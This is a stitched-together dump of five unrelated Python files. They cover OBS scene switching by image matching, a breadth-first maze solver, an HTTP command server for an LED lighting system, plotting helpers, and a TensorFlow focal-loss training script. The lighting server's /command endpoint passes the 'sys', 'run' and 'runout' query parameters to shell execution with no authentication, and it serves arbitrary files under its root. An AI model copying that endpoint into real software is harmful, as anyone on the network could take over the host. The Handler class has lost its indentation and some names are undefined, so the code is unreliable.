    # cached anywhere, just returned.
    return valid_indices
def get_good_matches(matches, num_good_matches_required, show_debug_window):
    """Apply Lowe's ratio test (0.75) to knnMatch (best, second-best) pairs.

    Stops early once enough good matches were found -- unless the debug
    window is shown, in which case all good matches are collected so they
    can be displayed.
    """
    good_matches = []
    for best, second_best in matches:
        if best.distance < 0.75 * second_best.distance:
            good_matches.append([best])
            # Performance optimization when not in debug mode.
            if not show_debug_window and len(good_matches) >= num_good_matches_required:
                break
    return good_matches
def frame_contains_one_or_more_matching_images(frame, mask, image_descriptors, feature_detector, feature_matcher, num_good_matches_required, show_debug_window):
    # Returns (True, n_good) as soon as any template's descriptors yield
    # enough ratio-test-passing matches against the frame's keypoints;
    # otherwise (False, n_good) for the last template checked.
    if frame is not None:
        keypoints, keypoint_descriptors = feature_detector.detectAndCompute(cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY), mask)
        for image_descriptor in image_descriptors:
            matches = feature_matcher.knnMatch(keypoint_descriptors, image_descriptor, k=2)
            # Apply ratio test
            good = get_good_matches(matches, num_good_matches_required, show_debug_window)
            if show_debug_window:
                cv2.drawKeypoints(frame, keypoints, frame)
                cv2.imshow("obs-screen-recognition", cv2.resize(frame, (0, 0), fx=0.5, fy=0.5))
                cv2.waitKey(1)
                print("Num matches: {}".format(len(good)))
            if len(good) >= num_good_matches_required:
                return (True, len(good))
    # NOTE(review): if frame is None (or image_descriptors is empty) `good`
    # is unbound here and this raises NameError -- confirm frame/descriptors
    # are always non-empty at the call site.
    return (False, len(good))
@click.command()
@click.option('--show-debug-window', is_flag=True)
@click.argument('resource-dir', type=click.Path(exists=True,file_okay=False, dir_okay=True))
@click.option('--password')
def main(resource_dir, password, show_debug_window):
    """Entry point: connect to OBS, capture the configured monitor, and run
    the recognition loop that switches scenes when a reference image appears.

    resource_dir is expected to contain one subdirectory per resolution
    (e.g. "1440p") with the reference images, plus a mask-<res>.png file.
    """
    # Settings live next to this script, not in the current working directory.
    with open(dirname(realpath(__file__)) + "/settings.json") as settings_file:
        application_settings = json.load(settings_file)
    print("Running with settings:", application_settings)
    monitor_to_capture = application_settings["monitor_to_capture"]
    default_scene_name = application_settings["default_scene_name"]
    target_scene_name = application_settings["target_scene_name"]
    num_features_to_detect = application_settings["num_features_to_detect"]
    num_good_matches_required = application_settings["num_good_matches_required"]
    if password:
        obs = obsws(host, port, password)
    else:
        obs = obsws(host, port)
    obs.connect()
    scenes = obs.call(requests.GetSceneList())
    print("Detected scenes in OBS: " + str(scenes))
    if show_debug_window:
        cv2.startWindowThread()
        cv2.namedWindow("obs-screen-recognition")
    with mss() as screen_capture:
        # Grab one frame up front purely to learn the monitor's resolution.
        initial_frame_resolution = numpy.array(screen_capture.grab(screen_capture.monitors[monitor_to_capture])).shape[0:2]
        screen_size = str(initial_frame_resolution[0]) + "p" # E.g. 1440p
        print("Detected monitor resolution to be {}".format(screen_size))
        if initial_frame_resolution not in VALID_RESOLUTIONS:
            print(VALID_RESOLUTIONS_ERROR_MESSAGE.format(resolution = initial_frame_resolution))
            exit(1)
        image_directory = resource_dir + "/" + screen_size
        mask_file = resource_dir + "/mask-" + screen_size + ".png"
        # Reference images are matched in grayscale; the mask limits the search area.
        image_files_to_search_for = [cv2.cvtColor(cv2.imread(join(image_directory, f)), cv2.COLOR_BGR2GRAY) for f in listdir(image_directory) if isfile(join(image_directory, f))]
        image_mask = cv2.imread(mask_file, cv2.IMREAD_GRAYSCALE)
        feature_detector = cv2.ORB_create(nfeatures=num_features_to_detect, scoreType=cv2.ORB_FAST_SCORE, nlevels=1, fastThreshold=10)
        feature_matcher = cv2.BFMatcher(cv2.NORM_HAMMING)
        # Descriptors for the reference images are computed once, outside the loop.
        image_descriptors = [feature_detector.detectAndCompute(image, None)[1] for image in image_files_to_search_for]
        while True:
            try:
                tick_time, num_matches = execute_tick(screen_capture, monitor_to_capture, image_mask, image_descriptors, feature_detector, feature_matcher, num_good_matches_required, obs, default_scene_name, target_scene_name, show_debug_window)
                if tick_time:
                    print("Tick took {} seconds. Suggested OBS source delay: {}ms. Num good matches: {}".format(tick_time, round(tick_time, 2) * 1000, num_matches))
            except Exception as e:
                # Keep the loop alive on transient capture/OBS errors.
                print(e)
if __name__ == "__main__":
main() |
###
### Breadth-first search: start at the tree root and explore all neighbor
### nodes, saving each partial path in the queue. Every node at the present
### depth is processed before moving on to the nodes at the next depth level.
### Keep running until the queue runs out of nodes.
### When the end node is reached, the path saved in the queue is the sequence
### of directions that led there, tracked by counting the x,y position.
###
import pygame
import queue
def maze1():
    """Return the demo maze as a list of rows.

    "#" = wall, " " = open cell, "O" = entrance (top row), "X" = exit.
    """
    return [
        ["#", "O", "#", "#", "#", "#", "#"],
        ["#", " ", " ", " ", "#", " ", "#"],
        ["#", "#", "#", " ", "#", " ", "#"],
        ["#", " ", "#", " ", " ", " ", "#"],
        ["#", " ", "#", "#", "#", " ", "#"],
        ["#", " ", "#", " ", "#", " ", "#"],
        ["#", " ", "#", " ", "#", " ", "#"],
        ["#", " ", "#", " ", "#", " ", "#"],
        ["#", " ", "#", " ", "#", " ", "#"],
        ["#", " ", "#", " ", "#", " ", "#"],
        ["#", " ", " ", " ", "#", " ", "#"],
        ["#", " ", " ", "#", " ", " ", "#"],
        ["#", "#", "#", "#", "X", "#", "#"],
    ]
def pathfind(maze, moves):
    """Replay *moves* from the entrance; print the maze and return True if "X" is reached."""
    # Locate the entrance "O" in the top row.
    for col, cell in enumerate(maze[0]):
        if cell == "O":
            start = col
    x_coor, y_coor = start, 0
    deltas = {"L": (-1, 0), "R": (1, 0), "U": (0, -1), "D": (0, 1)}
    for move in moves:
        dx, dy = deltas.get(move, (0, 0))
        x_coor += dx
        y_coor += dy
        if maze[y_coor][x_coor] == "X":
            print("Path: " + moves)
            printMaze(maze, moves)
            return True
    return False
def valid(maze, moves):
    """Return True if *moves* stays inside the maze and never enters a wall."""
    # Locate the entrance "O" in the top row.
    for col, cell in enumerate(maze[0]):
        if cell == "O":
            start = col
    x_coor, y_coor = start, 0
    steps = {"L": (-1, 0), "R": (1, 0), "U": (0, -1), "D": (0, 1)}
    for move in moves:
        dx, dy = steps.get(move, (0, 0))
        x_coor += dx
        y_coor += dy
        inside = 0 <= x_coor < len(maze[0]) and 0 <= y_coor < len(maze)
        if not inside:
            return False
        if maze[y_coor][x_coor] == "#":
            return False
    return True
def printMaze(maze, path=""):
    """Print the maze with every cell visited by *path* marked with "O".

    The entrance cell itself is only marked if the path revisits it.
    """
    for col, cell in enumerate(maze[0]):
        if cell == "O":
            start = col
    x_coor, y_coor = start, 0
    visited = set()
    offsets = {"L": (-1, 0), "R": (1, 0), "U": (0, -1), "D": (0, 1)}
    for move in path:
        dx, dy = offsets.get(move, (0, 0))
        x_coor += dx
        y_coor += dy
        visited.add((y_coor, x_coor))
    for row_idx, row in enumerate(maze):
        line = ""
        for col_idx, cell in enumerate(row):
            line += "O " if (row_idx, col_idx) in visited else cell + " "
        print(line)
# BFS driver: candidate paths are explored in order of length, so the first
# path that reaches "X" is a shortest path.
nums = queue.Queue()
nums.put("")
add = ""
#which maze to find?
maze = maze1()
print()
print()
while not pathfind(maze, add):
    #grid = create_grid()
    add = nums.get()
    #print(add)
    # Extend the current path one step in each direction, keeping only the
    # extensions that stay inside the maze and off the walls.
    for y_coor in ["L", "R", "U", "D"]:
        put = add + y_coor
        if valid(maze, put):
            nums.put(put)
print("Breadth First Path Finding")
print() |
#!/usr/bin/python
import SocketServer
from BaseHTTPServer import BaseHTTPRequestHandler
import urlparse
import serial
import time
import sys
from subprocess import call
import os
import socket
from socket import error as socket_error
import os.path
import datetime
import led_command as lc
import argparse
import app_ui as ui
import struct
import threading
import fcntl
from subprocess import Popen, PIPE
# ---------------------------------------------------------
# Module-wide state. NOTE(review): a `global` statement at module level is a
# no-op; these two lines only document which names the functions below share.
global httpd, webpage, base_path, last_run, host_name, host_ip, app_description, verbose_mode, debug_mode, macro_count, programs, macro_run_number, retry_wait, ip_address, port
global multicast_group_ip, multicast_port, timeout_in_seconds, multicast_group, num_times, no_keys, msg_delay
last_run = ''  # name of the last app launched via /command?run=...
last_run_full = ''  # full command line (with arguments) of that app
#host_name = socket.getfqdn(socket.gethostname())
#host_ip = socket.gethostbyname(socket.gethostname())
app_description = None
verbose_mode = None
debug_mode = None
retry_wait = None
ip_address = None
port = None
def get_ip_address(ifname):
    """Return the IPv4 address bound to interface *ifname*, or "" on failure.

    Uses the SIOCGIFADDR ioctl, so this only works on Linux. Fixes: the probe
    socket was previously leaked, and a bare `except:` swallowed every
    exception (including KeyboardInterrupt).
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
        return socket.inet_ntoa(fcntl.ioctl(
            s.fileno(),
            0x8915,  # SIOCGIFADDR
            struct.pack('256s', ifname[:15])
        )[20:24])
    except (IOError, OSError, struct.error):
        # Interface missing / no address assigned / bad interface name.
        return ""
    finally:
        s.close()
# Wifi interface used when this device joins an existing network (AP-client mode).
client_interface_name = 'apcli0'
def get_client_ip():
    # IP of the client-mode wifi interface; "" when it has no address.
    return get_ip_address(client_interface_name)
def get_client_hostname():
    # Short hostname of this device.
    return socket.gethostname()
host_name = get_client_hostname()
host_ip = get_client_ip()
# ---------------------------------------------------------
def get_options():
    """Parse command-line options into the module-level configuration globals.

    Fix: the names shared with the multicast code were listed on two
    duplicated `global` lines; merged into one declaration each.
    """
    global verbose_mode, debug_mode, retry_wait, base_path, webpage, ip_address, port
    global multicast_group_ip, multicast_port, timeout_in_seconds, multicast_group, num_times, no_keys, msg_delay
    parser = argparse.ArgumentParser(description=app_description)
    parser.add_argument("webpage", metavar="W", nargs="?", help="path to web page")
    parser.add_argument("rootpath", metavar="R", nargs="?", help="root path for files")
    parser.add_argument("-a", "--addr", dest="address", default="", help='server address (all addresses)')
    parser.add_argument("-p", "--port", dest="port", type=int, default=8080, help='server port (8080)')
    parser.add_argument("-r", "--retry", dest="retry", type=int, default=10, help='retry wait (secs) (10)')
    parser.add_argument("-v", "--verbose", dest="verbose", action="store_true", help="display verbose info (False)")
    parser.add_argument("-d", "--debug", dest="debug", action="store_true", help="display debugging info (False)")
    parser.add_argument("-m", "--mcaddr", dest="mcaddr", default='224.3.29.71', help='multicast group IP address (224.3.29.71)')
    parser.add_argument("-o", "--mcport", dest="mcport", type=int, default=10000, help='multicast port (10000)')
    parser.add_argument("-t", "--timeout", dest="timeout", type=float, default=0.1, help='timeout time waiting for responses (seconds) (0.1)')
    parser.add_argument("-n", "--numtimes", dest="times", type=int, default=15, help='number of times to issue command (15)')
    parser.add_argument("-k", "--nokeys", dest="nokeys", action='store_true', help='disables keys sent for dupe detection (False)')
    parser.add_argument("-e", "--delay", dest="delay", type=float, default=0.001, help='delay exponent between duplicate messages (seconds) (0.001)')
    args = parser.parse_args()
    verbose_mode = args.verbose
    debug_mode = args.debug
    retry_wait = args.retry
    ip_address = args.address
    port = args.port
    base_path = args.rootpath
    if base_path is None:
        # Default the file root to the current directory.
        base_path = os.getcwd() + '/'
    webpage = args.webpage
    if webpage is None:
        webpage = base_path + 'http_command.html'
    multicast_group_ip = args.mcaddr
    multicast_port = args.mcport
    timeout_in_seconds = args.timeout
    multicast_group = (multicast_group_ip, multicast_port)
    num_times = args.times
    no_keys = args.nokeys
    msg_delay = args.delay
def validate_options():
    """Validate the parsed options; currently nothing to check, so always True."""
    has_errors = False
    return not has_errors
# ---------------------------------------------------------
def initialize():
    # Parse options, start the LED-command and UI helper modules, and exit
    # early if the options do not validate.
    global app_description
    app_description = "Apollo Lighting System - HTTP Commander v.2.0 4-0-2018"
    get_options()
    if not validate_options():
        sys.exit("\nExiting...\n")
    lc.begin(verbose_mode)
    ui.begin(verbose_mode)
    #lc.attention()
    #lc.stop_all()
    #lc.command("cnt")
def introduction():
    # Print the startup banner; the verbose entries only appear with -v.
    ui.app_description(app_description)
    ui.info_entry("client ip address", host_ip)
    ui.info_entry("server name", host_name)
    print
    ui.report_verbose("verbose mode")
    ui.verbose_entry("root path", base_path)
    ui.verbose_entry("web page", webpage)
    ui.verbose_entry("server ip_address", "all" if ip_address == '' else ip_address)
    ui.verbose_entry("port", str(port))
    ui.verbose_entry("multicast group IP", multicast_group_ip)
    ui.verbose_entry("multicast port", str(multicast_port))
    ui.verbose_entry("reply timeout", str(timeout_in_seconds) + "s")
    ui.verbose_entry("sends per message", str(num_times))
    ui.verbose_entry("sending keys", str(no_keys == False))
    ui.verbose_entry("message delay", str(msg_delay))
    ui.verbose_entry("retry wait", str(retry_wait) + "s")
    ui.verbose_entry("debug_mode", str(debug_mode))
    ui.report_verbose()
# ---------------------------------------------------------
class Handler(BaseHTTPRequestHandler):
global last_run, last_run_full, host_name, host_ip, to_rerun
def run_app(self, app, track=True):
global last_run, last_run_full
if app != 'stop':
run = base_path + app + ' &'
self.log('running: ' + run)
call(run, shell=True)
if track:
last_run_full = app
last_run = app.split()[0]
else:
last_run_full = ''
last_run = ''
else:
last_run_full = ''
last_run = ''
def run_app_capture(self, app):
run = base_path + app
self.log('running with capture: ' + run)
process = Popen(run.split(" "), stdout=PIPE)
(output, err) = process.communicate()
exit_code = process.wait()
return output
def kill_last_app(self):
global last_run, last_run_full
if last_run != '':
self.log('killing: ' + last_run)
call('killall -9 ' + last_run, shell=True)
last_run_full = ''
last_run = ''
def log(self, message):
print
print '#' * 80
print '## ' + message
print '#' * 80
print
def banner(self):
if last_run != '':
return """
<div class="well well-sm clearfix">
<div class="col-xs-9"><i class="fa fa-circle-o-notch fa-spin fa-fw"></i> %(last_run)s</div>
<div class="col-xs-3"><a class="btn btn-link btn-xs pull-right" role="button" href="/command?run=stop"><span class="glyphicon glyphicon-remove-sign"></span></a></div>
</div>
""" % globals()
return ''
def footer(self):
return """
<div class="small text-center">
%(host_name)s %(host_ip)s
</div>
<div class="small text-center">
%(last_run_full)s
</div>
""" % globals()
def content_type(self, file_path):
filename, file_ext = os.path.splitext(file_path)
content_type = "application/octet-stream"
if file_ext == '.html':
content_type = "text/html"
elif file_ext == '.txt':
content_type = "text/plain"
elif file_ext == '.css':
content_type = "text/css"
elif file_ext == '.js':
content_type = "application/javascript"
elif file_ext == '.ico':
content_type = "image/x-icon"
elif file_ext == '.png':
content_type = "image/png"
return content_type
def is_cached(self, file_path, headers):
filetime = datetime.datetime.fromtimestamp(os.path.getmtime(file_path))
filetime_str = filetime.strftime("%a, %d %b %Y %H:%M:%S GMT")
is_cached = False
if headers != None:
if 'If-Modified-Since' in headers:
modified_since = headers['If-Modified-Since']
if modified_since != None:
if modified_since.lower() == filetime_str.lower():
is_cached = True
return is_cached
def serve_text(self, text):
content_type = self.content_type("*.txt")
self.send_response(200)
self.send_header("Content-type", content_type)
self.send_header("Content-Length", len(text))
self.send_header("Cache-Control", "no-cache")
self.end_headers()
self.wfile.write(text)
self.wfile.close()
def serve_page(self, page, headers={}):
global last_run, last_run_full, host_name, host_ip
filetime = datetime.datetime.fromtimestamp(os.path.getmtime(page))
filetime_str = filetime.strftime("%a, %d %b %Y %H:%M:%S GMT")
is_cached = self.is_cached(page, headers)
if is_cached:
self.send_response(304)
self.send_header("Content-Length", "0")
self.end_headers()
return
content_type = self.content_type(page)
self.send_response(200)
self.send_header("Content-type", content_type)
# can't cache the html page until actions are backgrounded
if content_type == "text/html":
self.send_header("Cache-Control", "no-cache")
else:
self.send_header("Cache-Control", "private")
self.send_header("Last-Modified", filetime_str)
self.end_headers()
banner = self.banner()
footer = self.footer()
f = open(page, 'r')
if content_type == "text/html":
self.wfile.write(f.read().replace('<!-- banner -->', banner).replace('<!-- footer -->', footer))
else:
self.wfile.write(f.read())
f.close
self.wfile.close()
def handle_commands(self, commands):
lc.command(":::")
for cmd in commands:
lc.command(cmd)
def stop_running_app(self):
global to_rerun
if last_run != '':
to_rerun = last_run_full
self.kill_last_app();
else:
to_rerun = ''
def restart_running_app(self):
if to_rerun != '':
self.run_app(to_rerun)
def do_cmd(self, args):
self.stop_running_app()
self.handle_commands(["3:pau"] + args['cmd'] + [":3:cnt"])
self.restart_running_app()
def do_color(self, args):
self.stop_running_app()
self.handle_commands(["2:pau"] + args['color'] + [":1:cnt:flu"])
self.restart_running_app()
def do_macro(self, args):
self.stop_running_app()
self.handle_commands(["1:pau:2:cnt"] + [str(args['macro'][0]) + ":run"])
self.restart_running_app()
def do_run(self, args):
self.kill_last_app()
self.run_app(args['run'][0])
def do_runonce(self, args):
self.run_app(args['runonce'][0], False)
def do_runout(self, args):
result = self.run_app_capture(args['runout'][0])
self.serve_text(result)
def do_sys(self, args):
for sys in args['sys']:
self.log('shell command: ' + sys)
call(sys, shell=True)
def do_cast(self, args):
for cast in args['cast']:
send_background_message(cast)
def get_headers(self):
return {'If-Modified-Since': self.headers.getheader('If-Modified-Since')}
def do_webpage(self):
headers = self.get_headers()
# serve main page
# self.serve_page(webpage, headers)
# until command actions are handled asynchronously, need to
# serve the page each time non-cached
self.serve_page(webpage)
def do_textpage(self, text):
self.serve_text(test)
def do_file(self, url):
headers = self.get_headers()
if os.path.isfile(base_path + url.path):
page = base_path + url.path
self.serve_page(page, headers)
return True
else:
return False
def do_notfound(self):
msg = "<html><body><h1>404 Not Found</h1></body></html>"
self.send_response(404)
self.send_header("Content-Type", "text/html")
self.send_header("Content-Length", len(msg))
self.end_headers()
self.wfile.write(msg)
self.wfile.close()
def do_command(self, url):
args = urlparse.parse_qs(url.query)
if 'cmd' in args:
self.do_cmd(args)
if 'color' in args:
self.do_color(args)
if 'macro' in args:
self.do_macro(args)
if 'run' in args:
self.do_run(args)
if 'runonce' in args:
self.do_runonce(args)
if 'runout' in args:
self.do_runout(args)
return
if 'sys' in args:
self.do_sys(args)
if 'cast' in args:
self.do_cast(args)
self.do_webpage()
def do_GET(self):
url = urlparse.urlparse(self.path)
if url.path == '/command':
self.do_command(url)
else:
if not self.do_file(url):
self.do_notfound()
# ---------------------------------------------------------
def cast_socket():
    """Create a UDP socket configured for local-segment multicast sends."""
    udp_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    # Don't block forever while waiting for replies.
    udp_sock.settimeout(timeout_in_seconds)
    # TTL of 1 keeps the datagrams on the local network segment.
    udp_sock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, struct.pack('b', 1))
    return udp_sock
def add_key(command):
    """Prefix *command* with "host/timestamp;" so receivers can detect duplicates."""
    dupe_key = host_name + "/" + str(time.time())
    return dupe_key + ";" + command
def send_socket_message(sock, message, times):
    # Broadcast *message* to the multicast group *times* times with an
    # exponentially growing delay between repeats; duplicates are filtered on
    # the receiving side via the prepended key (unless -k disabled keys).
    if no_keys != True:
        message = add_key(message)
    for n in range(0, times):
        # Send data to the multicast group
        ui.report_verbose('sending "%s"' % message)
        sent = sock.sendto(message, multicast_group)
        if verbose_mode:
            # Drain any replies until the socket timeout fires (verbose only).
            while True:
                try:
                    data, server = sock.recvfrom(256)
                #except KeyboardInterrupt:
                #    break
                except socket.timeout:
                    break
                else:
                    ui.report_verbose('received "%s" from %s' % (data, server))
        if n < (times - 1):
            # Exponential backoff between duplicate sends.
            time.sleep(msg_delay * (2 ** n))
def send_message(message):
    """Open a multicast socket, broadcast *message* num_times, then close it."""
    outbound = cast_socket()
    send_socket_message(outbound, message, num_times)
    outbound.close()
# Threads currently broadcasting messages in the background.
background_threads = []
def handle_background_message(message):
    """Thread target: broadcast *message*, then deregister this thread."""
    send_message(message)
    me = threading.current_thread()
    background_threads.remove(me)
    ui.report_verbose("terminating thread: " + str(me))
def send_background_message(message):
    """Broadcast *message* on a freshly started background thread."""
    worker = threading.Thread(target=handle_background_message, args=(message,))
    ui.report_verbose("new thread: " + str(worker))
    background_threads.append(worker)
    worker.start()
def wait_for_active_threads():
    """Block until every background sender thread has finished."""
    # NOTE(review): finished threads remove themselves from this list while we
    # iterate it - preserved from the original; confirm this is intended.
    if len(background_threads) > 0:
        ui.report_warn("waiting for active threads to terminate...")
        for worker in background_threads:
            worker.join()
############################################################################
def start_server():
    """Bind the TCP server, retrying every retry_wait seconds until the port is free.

    Fix: the Python-2-only `except socket_error,e:` syntax was replaced with
    `except ... as e:`, which works on Python 2.6+ and Python 3.
    """
    global httpd
    while(True):
        try:
            httpd = SocketServer.TCPServer((ip_address, port), Handler)
        except socket_error as e:
            # Port still busy (e.g. a previous instance lingering) - wait and retry.
            ui.report_error("Error: " + str(e) + " - retrying")
            time.sleep(retry_wait)
            continue
        ui.report_info("Listening...")
        break
def run_server():
    # Serve until Ctrl-C; close the listening socket before re-raising so the
    # port is released, letting the main-level handler finish cleanup.
    try:
        httpd.serve_forever()
    except KeyboardInterrupt:
        ui.report_verbose("keyboard interupt")
        httpd.server_close()
        #sys.exit("\nExiting...\n")
        raise
def setup():
    # One-time initialization plus the console banner.
    initialize()
    introduction()
def run():
    # Bind (with retry) and serve until interrupted.
    start_server()
    run_server()
def conclude():
    # Best-effort cleanup: stop whatever app we last launched.
    if last_run != '':
        ui.report_info('killing: ' + last_run)
        call('killall ' + last_run, shell=True)
############################################################################
############################################################################
if __name__ == '__main__':
    setup()
    try:
        run()
    except KeyboardInterrupt:
        pass
        # NOTE(review): this sys.exit still runs after `pass`, but its
        # SystemExit is superseded by the one raised in the finally block
        # below - confirm the double exit is intentional.
        sys.exit("\nExiting...\n")
    finally:
        wait_for_active_threads()
        conclude()
        sys.exit("\nExiting...\n")
|
import itertools
from logging import *
import sys
import numpy as np
import matplotlib.pyplot as plt
basicConfig(stream=sys.stderr, level=DEBUG)
def plot_confusion_matrix(cm, classes,
                          normalize=False,
                          title='Confusion matrix',
                          cmap=plt.cm.Blues):
    """
    This function prints and plots the confusion matrix.
    Normalization can be applied by setting `normalize=True`.
    https://scikit-learn.org/stable/auto_examples/model_selection/plot_confusion_matrix.html

    cm: square confusion-matrix array (e.g. from sklearn.metrics.confusion_matrix).
    classes: tick labels for both axes, in the same order as cm's rows/cols.
    Draws onto the current matplotlib figure; call plt.show()/savefig afterwards.
    """
    if normalize:
        # Normalize each row (true class) to sum to 1.
        cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]
        # print("Normalized confusion matrix")
    else:
        # print('Confusion matrix, without normalization')
        pass
    # print(cm)
    plt.imshow(cm, interpolation='nearest', cmap=cmap)
    plt.title(title)
    plt.colorbar()
    tick_marks = np.arange(len(classes))
    plt.xticks(tick_marks, classes, rotation=45)
    plt.yticks(tick_marks, classes)
    fmt = '.2f' if normalize else 'd'
    # Use white text on dark cells, black on light ones.
    thresh = cm.max() / 2.
    for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):
        plt.text(j, i, format(cm[i, j], fmt),
                 horizontalalignment="center",
                 color="white" if cm[i, j] > thresh else "black")
    plt.ylabel('True label')
    plt.xlabel('Predicted label')
    plt.tight_layout()
def plot_precision_recall_f1(metrics, metric_labels,
                             title='Metrics for: ',
                             cmap=plt.cm.Blues):
    """Render a one-row heatmap of metric values with one column per label.

    metrics: sequence of metric values; the last element is dropped before
    plotting (presumably a support/count entry - confirm against callers).
    metric_labels: x-axis labels, one per remaining metric.
    Draws onto the current matplotlib figure.
    """
    # Drop the last entry and reshape into a single-row 2D array for imshow.
    metrics = np.array(metrics[:-1]).reshape(-1, 1).T
    plt.imshow(metrics, interpolation='nearest', cmap=cmap, aspect='auto')
    plt.title(title)
    tick_marks = np.arange(len(metric_labels))
    plt.xticks(tick_marks, metric_labels, rotation=45)
    # Hide the meaningless y-axis ticks/labels for the single row.
    plt.tick_params(
        axis='y',          # changes apply to the x-axis
        which='both',      # both major and minor ticks are affected
        bottom=False,      # ticks along the bottom edge are off
        top=False,         # ticks along the top edge are off
        labelbottom=False,
        right=False,
        left=False,
        labelleft=False)
    fmt = '.2f'
    # Use white text on above-average cells, black otherwise.
    thresh = np.average(metrics)
    for i, j in itertools.product(range(metrics.shape[0]), range(metrics.shape[1])):
        plt.text(j, i, format(metrics[i, j], fmt),
                 horizontalalignment="center",
                 color="white" if metrics[i, j] > thresh else "black")
    plt.tight_layout()
def plot_k_folds(k_folds: int, best_param_per_iter: np.array, extra_params: tuple,
                 labels=['K', 'RMSE for Test', 'RMSE for Train', 'Cost', 'Params'], cmap=plt.cm.Blues):
    """Plot a per-fold heatmap of metrics, with the fold's best parameters
    rendered as text in the final column.

    best_param_per_iter: one parameter dict per iteration/fold.
    extra_params: tuple of per-iteration metric sequences; the last value of
    each is placed in that fold's row.
    Creates its own figure sized to the number of folds; draw/show afterwards.
    """
    metrics_list = []
    for i in range(len(best_param_per_iter)):
        extra_param = tuple([p[i][-1] for p in extra_params])
        # Last column is a placeholder 0; it is overwritten with the params text below.
        metrics_list.append(np.array([i % k_folds, *extra_param, 0]))
    metrics = np.array(metrics_list)
    metric_labels = labels
    title = get_formatted_params(best_param_per_iter[0], 'Params are shortened to \n')
    # Scale figure height with the number of folds and the title length.
    height = int(2 * len(best_param_per_iter) * (len(title) * .0003 + 1))
    # print(height)
    debug(f'height for k fold figure is {height}')
    plt.figure(figsize=(8, height))
    plt.imshow(metrics, interpolation='nearest', cmap=cmap, aspect='auto')
    plt.title(title)
    tick_marks = np.arange(len(metric_labels))
    plt.xticks(tick_marks, metric_labels, rotation=45)
    # Hide y-axis ticks/labels; rows are identified by the K column instead.
    plt.tick_params(
        axis='y',          # changes apply to the x-axis
        which='both',      # both major and minor ticks are affected
        bottom=False,      # ticks along the bottom edge are off
        top=False,         # ticks along the top edge are off
        labelbottom=False,
        right=False,
        left=False,
        labelleft=False)
    fmt = '.2f'
    thresh = np.average(metrics)
    for i, j in itertools.product(range(metrics.shape[0]), range(metrics.shape[1])):
        if j != metrics.shape[1] - 1:
            plt.text(j, i, format(metrics[i, j], fmt),
                     horizontalalignment="center",
                     color="white" if metrics[i, j] > thresh else "black")
        else:
            # Final column: abbreviated parameter name/value pairs as text.
            s = ['' + str(get_shortened_key(param)) + ':' + str(best_param_per_iter[i][param]) for param in
                 best_param_per_iter[i]]
            plt.text(j, i, ',\n'.join(s),
                     horizontalalignment="center",
                     verticalalignment='center',
                     color="black")
    plt.tight_layout()
def get_formatted_params(parms: dict, prefix='', include_values=False):
    """Format a parameter dict as newline-separated entries after *prefix*.

    With include_values: one "ACRONYM:value" line per parameter.
    Without: one "full_name : ACRONYM" legend line per parameter.
    """
    pieces = [prefix]
    for key in parms:
        short = get_shortened_key(key)
        if include_values:
            pieces.append(short + ':' + str(parms[key]) + '\n')
        else:
            pieces.append(key + ' : ' + short + '\n')
    return ''.join(pieces)
def get_shortened_key(k: str):
    """Gets the first letter of each underscore-separated word, and returns the acronym."""
    return ''.join(word[0].upper() for word in k.split('_'))
|
# -*- coding: utf-8 -*-
#@Author : lynch
import tensorflow as tf
from tensorflow import keras
from tensorflow.keras import layers
from tensorflow.keras.optimizers import Adam
from tensorflow.keras.layers import Input, Dense,Dropout,LSTM,Bidirectional
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import random
from sklearn import metrics
import tensorflow.keras.backend as K
#在自己的库函数
import dataing ##读取数据
import data_same_length ##处理成定长数据
import loss_function
def binary_focal_loss(gamma=2, alpha=0.25):
    """
    Binary form of focal loss, for two-class classification problems.
    focal_loss(p_t) = -alpha_t * (1 - p_t)**gamma * log(p_t)
    where p = sigmoid(x), p_t = p or 1 - p depending on if the label is 1 or 0, respectively.
    References:
        https://arxiv.org/pdf/1708.02002.pdf
    Usage:
     model.compile(loss=[binary_focal_loss(alpha=.25, gamma=2)], metrics=["accuracy"], optimizer=adam)
    """
    alpha = tf.constant(alpha, dtype=tf.float32)
    gamma = tf.constant(gamma, dtype=tf.float32)
    def binary_focal_loss_fixed(y_true, y_pred):
        """
        y_true shape need be (None,1)
        y_pred need be compute after sigmoid
        """
        y_true = tf.cast(y_true, tf.float32)
        # alpha_t weights positives by alpha and negatives by (1 - alpha).
        alpha_t = y_true * alpha + (K.ones_like(y_true) - y_true) * (1 - alpha)
        # p_t is the predicted probability of the true class; epsilon avoids log(0).
        p_t = y_true * y_pred + (K.ones_like(y_true) - y_true) * (K.ones_like(y_true) - y_pred) + K.epsilon()
        focal_loss = - alpha_t * K.pow((K.ones_like(y_true) - p_t), gamma) * K.log(p_t)
        return K.mean(focal_loss)
    return binary_focal_loss_fixed
############################################
'''#数据读取
x,y = dataing.data_make()##不定长特征
#x,y = dataing.data_make_samelen()##定长特征
#数据预处理
x_set = np.array(x,dtype=object)
train_set = []
for i in range(len(x)):
train_set.append([x[i],y[i]])
random.shuffle(train_set)###数据重排
x_set1 = [e[0] for e in train_set]#特征数据
y_set1 = [f[1] for f in train_set]#标签
##训练数据最大长度,可以在dataing程序中查看,目前是268
max_length = 268
##keras.preprocessing.sequence.pad_sequences将多个序列截断或补齐为相同长度,返回numpy数组
x_set2 = keras.preprocessing.sequence.pad_sequences(x_set1, maxlen=max_length, dtype='float64',padding='post',value = [0.0,0.0])
y_set2 = np.array(y_set1)
#print(x_set2.shape)
##测试集训练集划分
x_train = x_set2[0:450]
y_train = y_set2[0:450,0]
print(y_train.shape)
print(x_train.shape)
x_test = x_set2[450:517]
y_test = y_set2[450:517,0]
#print(y_test[1])
#print(x_test[1])'''
################################################
# Data resampling (oversampling); the single-label handling lives in the imported module
import 查看数据平衡
x,y= 查看数据平衡.oversamp()
x_set = np.array(x,dtype=object)
# Shuffle the data
train_set = []
for i in range(len(x)):
    train_set.append([x[i],y[i]])
print(train_set[0])
random.shuffle(train_set)### reshuffle the samples
x_set1 = [e[0] for e in train_set]# feature data
y_set1 = [f[1] for f in train_set]# labels
## train/test split
x_set2 = np.array(x_set1)
y_set2 = np.array(y_set1)
x_train = x_set2[0:550]
y_train = y_set2[0:550]
x_test = x_set2[550:]
y_test = y_set2[550:]
